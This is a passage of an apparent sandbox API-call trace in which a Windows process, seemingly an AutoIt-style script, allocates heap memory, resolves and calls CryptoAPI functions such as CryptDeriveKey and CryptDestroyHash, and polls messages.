[0189.890] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0189.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0189.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ab8 [0189.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0189.890] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0189.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0189.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0189.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0189.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0189.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0189.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0189.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0189.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0189.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0189.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0189.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0189.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0189.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0189.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0189.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0189.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0189.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0189.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0189.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0189.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0189.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0189.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0189.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0189.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0189.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0189.891] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0189.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0189.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0189.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c38 [0189.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0189.891] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0189.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0189.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0189.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0189.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0189.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0189.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0189.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0189.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0189.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0189.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0189.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0189.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0189.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0189.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0189.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0189.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0189.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0189.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0189.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0189.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0189.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0189.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0189.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0189.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0189.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0189.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0189.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0189.910] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0189.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0189.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0189.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0189.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0189.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0189.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0189.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0189.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0189.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0189.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0189.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0189.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0189.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0189.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0189.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0189.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0189.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0189.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0189.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0189.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0189.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0189.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0189.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0189.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0189.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0189.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0189.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0189.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0189.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0189.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0189.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0189.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0189.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0189.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e50b30 [0189.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e50b30, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0189.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0189.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0189.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0189.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0189.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0189.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0189.912] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87510, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa86f50) returned 1 [0189.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0189.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0189.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0189.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0189.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0189.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0189.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0189.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0189.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0189.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0189.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0189.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0189.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0189.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0189.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0189.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0189.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0189.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0189.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0189.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0189.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0189.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0189.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0189.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0189.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0189.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0189.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0189.913] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0189.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0189.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0189.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0189.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0189.914] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.914] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0189.914] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0189.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0189.914] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0189.914] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0189.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0189.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0189.914] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0189.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0189.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b60 [0189.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0189.914] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0189.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0189.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0189.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0189.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0189.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0189.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0189.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0189.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0189.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0189.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0189.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0189.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0189.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0189.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0189.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0189.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0189.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0189.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0189.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0189.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0189.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0189.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0189.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0189.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0189.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0189.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0189.915] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0189.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0189.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0189.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0189.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0189.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0189.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0189.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0189.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0189.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0189.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0189.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0189.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0189.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0189.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0189.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0189.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0189.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0189.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0189.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0189.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0189.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69928 [0189.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69928, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0189.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0189.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0189.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0189.917] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0189.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0189.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0189.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0189.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0189.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0189.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0189.917] CryptDestroyHash (hHash=0xa87510) returned 1 [0189.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0189.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0189.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0189.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0189.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0189.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0189.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0189.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0189.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0189.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0189.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0189.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0189.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0189.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0189.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0189.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0189.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0189.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0189.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0189.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0189.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0189.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0189.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0189.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0189.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0189.918] 